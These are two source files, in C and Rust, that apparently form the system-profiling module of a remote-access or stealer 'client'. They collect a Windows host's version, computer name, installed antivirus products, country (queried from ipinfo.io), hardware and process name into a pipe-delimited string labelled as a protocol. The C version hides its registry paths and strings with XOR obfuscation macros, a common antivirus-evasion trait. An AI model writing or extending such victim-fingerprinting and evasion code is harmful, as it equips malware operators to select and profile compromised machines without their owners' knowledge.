File: client/src/sysinfo.c
#include "sysinfo.h"
#include "utils.h"
#include <windows.h>
#include <winhttp.h>
#include <stdio.h>
#include <psapi.h>

#pragma comment(lib, "winhttp.lib")
#pragma comment(lib, "psapi.lib")

static char* reg_read_sz(HKEY key, const char* subkey, const char* value) {
    HKEY hKey;
    if (RegOpenKeyExA(key, subkey, 0, KEY_READ, &hKey) != ERROR_SUCCESS) return NULL;
    DWORD size = 0;
    if (RegQueryValueExA(hKey, value, NULL, NULL, NULL, &size) != ERROR_SUCCESS) {
        RegCloseKey(hKey);
        return NULL;
    }
    char* buf = (char*)malloc(size);
    if (RegQueryValueExA(hKey, value, NULL, NULL, (LPBYTE)buf, &size) != ERROR_SUCCESS) {
        free(buf);
        RegCloseKey(hKey);
        return NULL;
    }
    RegCloseKey(hKey);
    return buf;
}

static char* get_win_version() {
    const char* key = _S("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion");
    char* product = reg_read_sz(HKEY_LOCAL_MACHINE, key, _S("ProductName"));
    char* build   = reg_read_sz(HKEY_LOCAL_MACHINE, key, _S("CurrentBuild"));
    char* display = reg_read_sz(HKEY_LOCAL_MACHINE, key, _S("DisplayVersion"));
    if (!display) display = reg_read_sz(HKEY_LOCAL_MACHINE, key, _S("ReleaseId"));

    char* result = (char*)malloc(256);
    sprintf(result, _S("%s %s (Build %s)"),
        product ? product : _S("Windows"),
        display ? display : "",
        build   ? build   : "");
    if (product) free(product);
    if (build)   free(build);
    if (display) free(display);
    return result;
}

static char* get_antivirus() {
    const char* av_paths[][2] = {
        {XOR_MARKER "\x00" "SOFTWARE\\AVAST Software\\Avast",  XOR_MARKER "\x00" "Avast"},
        {XOR_MARKER "\x00" "SOFTWARE\\AVG\\Antivirus",          XOR_MARKER "\x00" "AVG"},
        {XOR_MARKER "\x00" "SOFTWARE\\Bitdefender",             XOR_MARKER "\x00" "Bitdefender"},
        {XOR_MARKER "\x00" "SOFTWARE\\KasperskyLab",            XOR_MARKER "\x00" "Kaspersky"},
        {XOR_MARKER "\x00" "SOFTWARE\\McAfee",                  XOR_MARKER "\x00" "McAfee"},
        {XOR_MARKER "\x00" "SOFTWARE\\Norton",                  XOR_MARKER "\x00" "Norton"},
        {XOR_MARKER "\x00" "SOFTWARE\\ESET",                    XOR_MARKER "\x00" "ESET"},
        {XOR_MARKER "\x00" "SOFTWARE\\Trend Micro",             XOR_MARKER "\x00" "Trend Micro"},
        {XOR_MARKER "\x00" "SOFTWARE\\Malwarebytes",            XOR_MARKER "\x00" "Malwarebytes"},
        {NULL, NULL}
    };
    for (int i = 0; av_paths[i][0] != NULL; i++) {
        HKEY hKey;
        if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, xor_str((char*)av_paths[i][0]), 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
            RegCloseKey(hKey);
            return _strdup(xor_str((char*)av_paths[i][1]));
        }
    }
    char* disabled = reg_read_sz(HKEY_LOCAL_MACHINE,
        _S("SOFTWARE\\Microsoft\\Windows Defender"), _S("DisableAntiSpyware"));
    if (disabled && strcmp(disabled, _S("1")) == 0) { free(disabled); return _strdup(_S("Unknown")); }
    if (disabled) free(disabled);
    return _strdup(_S("Windows Defender"));
}

static char* get_country() {
    HINTERNET hSession = WinHttpOpen(_W("client/1.0"),
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
    if (!hSession) return _strdup(_S("??"));
    HINTERNET hConnect = WinHttpConnect(hSession, _W("ipinfo.io"), INTERNET_DEFAULT_HTTP_PORT, 0);
    if (!hConnect) { WinHttpCloseHandle(hSession); return _strdup(_S("??")); }
    HINTERNET hRequest = WinHttpOpenRequest(hConnect, _W("GET"), _W("/country"), NULL,
        WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
    if (!hRequest) { WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); return _strdup(_S("??")); }

    if (WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                           WINHTTP_NO_REQUEST_DATA, 0, 0, 0) &&
        WinHttpReceiveResponse(hRequest, NULL)) {
        DWORD size = 0;
        WinHttpQueryDataAvailable(hRequest, &size);
        if (size > 0) {
            char* buf = (char*)malloc(size + 1);
            DWORD read = 0;
            WinHttpReadData(hRequest, buf, size, &read);
            buf[read] = 0;
            char* p = buf + strlen(buf) - 1;
            while (p >= buf && (*p == '\r' || *p == '\n' || *p == ' ')) *p-- = 0;
            WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession);
            return buf;
        }
    }
    WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession);
    return _strdup(_S("??"));
}

static char* get_gpu() {
    char* gpu = reg_read_sz(HKEY_LOCAL_MACHINE,
        _S("SYSTEM\\CurrentControlSet\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0000"),
        _S("DriverDesc"));
    if (!gpu) gpu = reg_read_sz(HKEY_LOCAL_MACHINE,
        _S("SYSTEM\\CurrentControlSet\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0001"),
        _S("DriverDesc"));
    return gpu ? gpu : _strdup(_S("Unknown GPU"));
}

static char* get_cpu() {
    char* cpu = reg_read_sz(HKEY_LOCAL_MACHINE,
        _S("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0"),
        _S("ProcessorNameString"));
    if (cpu) {
        char* p = cpu;
        while (*p == ' ') p++;
        char* trim = _strdup(p);
        free(cpu);
        return trim;
    }
    return _strdup(_S("Unknown CPU"));
}

static char* get_ram() {
    MEMORYSTATUSEX ms;
    ms.dwLength = sizeof(ms);
    GlobalMemoryStatusEx(&ms);
    ULONGLONG totalMB = ms.ullTotalPhys  / (1024ULL * 1024ULL);
    ULONGLONG freeMB  = ms.ullAvailPhys  / (1024ULL * 1024ULL);
    char* buf = (char*)malloc(64);
    if (totalMB >= 1024)
        sprintf(buf, _S("%.1f GB free / %.1f GB total"),
            (double)freeMB / 1024.0, (double)totalMB / 1024.0);
    else
        sprintf(buf, _S("%llu MB free / %llu MB total"), freeMB, totalMB);
    return buf;
}

static char* get_disk() {
    ULARGE_INTEGER freeBytesAvail, totalBytes, totalFreeBytes;
    if (!GetDiskFreeSpaceExA(_S("C:\\"), &freeBytesAvail, &totalBytes, &totalFreeBytes))
        return _strdup(_S("Unknown"));
    double totalGB = (double)totalBytes.QuadPart      / (1024.0 * 1024.0 * 1024.0);
    double freeGB  = (double)totalFreeBytes.QuadPart  / (1024.0 * 1024.0 * 1024.0);
    char* buf = (char*)malloc(64);
    sprintf(buf, _S("%.1f GB free / %.1f GB total"), freeGB, totalGB);
    return buf;
}

static char* get_process_name() {
    char path[MAX_PATH] = {0};
    GetModuleFileNameA(NULL, path, MAX_PATH);
    char* last = strrchr(path, '\\');
    return _strdup(last ? last + 1 : path);
}

/* Protocol: WinVersion|DesktopName|AntiVirus|Country|GPU|CPU|RAM|Disk|ProcessName */
char* collect_sysinfo() {
    char* win     = get_win_version();
    char  computer[MAX_COMPUTERNAME_LENGTH + 1];
    DWORD csize   = sizeof(computer);
    GetComputerNameA(computer, &csize);
    char* av      = get_antivirus();
    char* country = get_country();
    char* gpu     = get_gpu();
    char* cpu     = get_cpu();
    char* ram     = get_ram();
    char* disk    = get_disk();
    char* proc    = get_process_name();

    size_t len = strlen(win) + strlen(computer) + strlen(av) + strlen(country)
               + strlen(gpu) + strlen(cpu) + strlen(ram) + strlen(disk) + strlen(proc) + 16;
    char* res = (char*)malloc(len);
    sprintf(res, _S("%s|%s|%s|%s|%s|%s|%s|%s|%s"),
        win, computer, av, country, gpu, cpu, ram, disk, proc);

    free(win); free(av); free(country);
    free(gpu); free(cpu); free(ram); free(disk); free(proc);
    return res;
}

File: client/src/sysinfo.rs
// Windows system info — pure Rust via windows crate (no PowerShell)

use windows::{
    core::PCWSTR,
    Win32::{
        Foundation::ERROR_SUCCESS,
        System::Registry::*,
    },
};
use std::ffi::OsString;
use std::os::windows::ffi::OsStringExt;

pub fn collect() -> String {
    let win_version  = get_win_version();
    let desktop_name = get_desktop_name();
    let antivirus    = get_antivirus();
    let country      = get_country();
    format!("{}|{}|{}|{}", win_version, desktop_name, antivirus, country)
}

// ── Windows version from registry ────────────────────────────────────────────

fn reg_read_sz(key: HKEY, subkey: &str, value: &str) -> Option<String> {
    unsafe {
        let subkey_w: Vec<u16> = subkey.encode_utf16().chain(Some(0)).collect();
        let value_w:  Vec<u16> = value.encode_utf16().chain(Some(0)).collect();

        let mut hkey = HKEY::default();
        let res = RegOpenKeyExW(key, PCWSTR(subkey_w.as_ptr()), 0, KEY_READ, &mut hkey);
        if res != ERROR_SUCCESS { return None; }

        let mut data_type = REG_VALUE_TYPE::default();
        let mut size = 0u32;
        // First call: get size
        RegQueryValueExW(hkey, PCWSTR(value_w.as_ptr()), None, Some(&mut data_type), None, Some(&mut size));

        let mut buf: Vec<u8> = vec![0u8; size as usize];
        let res2 = RegQueryValueExW(
            hkey,
            PCWSTR(value_w.as_ptr()),
            None,
            Some(&mut data_type),
            Some(buf.as_mut_ptr()),
            Some(&mut size),
        );
        RegCloseKey(hkey);

        if res2 != ERROR_SUCCESS { return None; }

        // REG_SZ is UTF-16LE; convert to Rust String
        let words: Vec<u16> = buf
            .chunks_exact(2)
            .map(|c| u16::from_le_bytes([c[0], c[1]]))
            .take_while(|&w| w != 0)
            .collect();
        Some(OsString::from_wide(&words).to_string_lossy().to_string())
    }
}

fn get_win_version() -> String {
    const KEY: &str = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion";
    let product = reg_read_sz(HKEY_LOCAL_MACHINE, KEY, "ProductName")
        .unwrap_or_else(|| "Windows".to_string());
    let build   = reg_read_sz(HKEY_LOCAL_MACHINE, KEY, "CurrentBuild")
        .unwrap_or_default();
    let display = reg_read_sz(HKEY_LOCAL_MACHINE, KEY, "DisplayVersion")
        .or_else(|| reg_read_sz(HKEY_LOCAL_MACHINE, KEY, "ReleaseId"))
        .unwrap_or_default();

    if build.is_empty() {
        product
    } else {
        format!("{} {} (Build {})", product, display, build)
    }
}

// ── Computer name from environment ───────────────────────────────────────────

fn get_desktop_name() -> String {
    std::env::var("COMPUTERNAME").unwrap_or_else(|_| "Unknown".to_string())
}

// ── Antivirus via Windows Security Center registry (simplified) ─────────────

fn get_antivirus() -> String {
    // Check if Windows Defender is enabled
    if let Some(defender) = reg_read_sz(HKEY_LOCAL_MACHINE,
        r"SOFTWARE\Microsoft\Windows Defender", "DisableAntiSpyware") {
        if defender == "0" {
            return "Windows Defender".to_string();
        }
    }

    // Check common antivirus registry paths
    let av_paths = [
        r"SOFTWARE\AVAST Software",
        r"SOFTWARE\AVG",
        r"SOFTWARE\Bitdefender",
        r"SOFTWARE\KasperskyLab",
        r"SOFTWARE\McAfee",
        r"SOFTWARE\Norton",
        r"SOFTWARE\Symantec",
        r"SOFTWARE\ESET",
        r"SOFTWARE\Trend Micro",
        r"SOFTWARE\Malwarebytes",
        r"SOFTWARE\Sophos",
    ];

    for path in av_paths.iter() {
        // Try to open the registry key
        let path_w: Vec<u16> = path.encode_utf16().chain(Some(0)).collect();
        unsafe {
            let mut hkey = HKEY::default();
            let res = RegOpenKeyExW(HKEY_LOCAL_MACHINE, PCWSTR(path_w.as_ptr()), 0, KEY_READ, &mut hkey);
            if res == ERROR_SUCCESS {
                RegCloseKey(hkey);
                // Extract the name from the path
                let name = path.trim_start_matches(r"SOFTWARE\").split('\\').next().unwrap_or(path);
                return name.to_string();
            }
        }
    }

    "Unknown".to_string()
}

// ── Country via HTTP (pure Rust / windows WinHTTP) ───────────────────────────

fn get_country() -> String {
    use windows::{
        core::PCWSTR,
        Win32::Networking::WinHttp::*,
    };
    unsafe {
        let agent:  Vec<u16> = "client\0".encode_utf16().collect();
        let server: Vec<u16> = "ipinfo.io\0".encode_utf16().collect();
        let path:   Vec<u16> = "/country\0".encode_utf16().collect();

        let session = WinHttpOpen(
            PCWSTR(agent.as_ptr()),
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            PCWSTR::null(),
            PCWSTR::null(),
            0,
        );
        if session.is_null() { return "??".to_string(); }

        let connect = WinHttpConnect(session, PCWSTR(server.as_ptr()), 80, 0);
        if connect.is_null() { WinHttpCloseHandle(session); return "??".to_string(); }

        let verb:    Vec<u16> = "GET\0".encode_utf16().collect();
        let request = WinHttpOpenRequest(
            connect,
            PCWSTR(verb.as_ptr()),
            PCWSTR(path.as_ptr()),
            PCWSTR::null(),
            PCWSTR::null(),
            std::ptr::null_mut(),
            WINHTTP_OPEN_REQUEST_FLAGS(0),
        );
        if request.is_null() {
            WinHttpCloseHandle(connect);
            WinHttpCloseHandle(session);
            return "??".to_string();
        }

        let headers: Vec<u16> = Vec::new();
        if WinHttpSendRequest(
            request,
            if headers.is_empty() { None } else { Some(&headers) },
            None,
            0,
            0,
            0,
        ).is_err() || WinHttpReceiveResponse(request, std::ptr::null_mut()).is_err() {
            WinHttpCloseHandle(request);
            WinHttpCloseHandle(connect);
            WinHttpCloseHandle(session);
            return "??".to_string();
        }

        let mut body = Vec::new();
        loop {
            let mut available = 0u32;
            if WinHttpQueryDataAvailable(request, &mut available).is_err() || available == 0 {
                break;
            }
            let mut buf = vec![0u8; available as usize];
            let mut read = 0u32;
            if WinHttpReadData(request, buf.as_mut_ptr() as *mut _, available, &mut read).is_err() {
                break;
            }
            buf.truncate(read as usize);
            body.extend_from_slice(&buf);
        }

        WinHttpCloseHandle(request);
        WinHttpCloseHandle(connect);
        WinHttpCloseHandle(session);

        let s = String::from_utf8_lossy(&body).trim().to_string();
        if s.is_empty() { "??".to_string() } else { s }
    }
}